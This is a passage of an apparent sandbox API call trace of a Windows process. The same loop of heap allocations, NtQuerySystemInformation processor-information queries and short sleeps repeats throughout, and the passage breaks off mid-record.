[0193.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.221] Sleep (dwMilliseconds=0x110) [0193.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.366] Sleep (dwMilliseconds=0x110) [0193.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.506] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.506] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.507] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.507] Sleep (dwMilliseconds=0x110) [0193.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.549] Sleep (dwMilliseconds=0x110) [0193.569] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.569] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.570] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.570] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.571] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.571] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.572] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.572] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.572] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.573] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.573] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.574] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.574] Sleep (dwMilliseconds=0x110) [0193.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.600] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.601] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.601] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.602] Sleep (dwMilliseconds=0x110) [0193.619] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.619] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.620] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.620] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.620] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.621] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.621] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.622] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.624] Sleep (dwMilliseconds=0x110) [0193.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.645] Sleep (dwMilliseconds=0x110) [0193.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.662] Sleep (dwMilliseconds=0x110) [0193.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.677] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.679] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.679] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.680] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.681] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.681] Sleep (dwMilliseconds=0x110) [0193.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.694] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.695] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.696] Sleep (dwMilliseconds=0x110) [0193.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.705] Sleep (dwMilliseconds=0x110) [0193.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.722] Sleep (dwMilliseconds=0x110) [0193.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.736] Sleep (dwMilliseconds=0x110) [0193.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 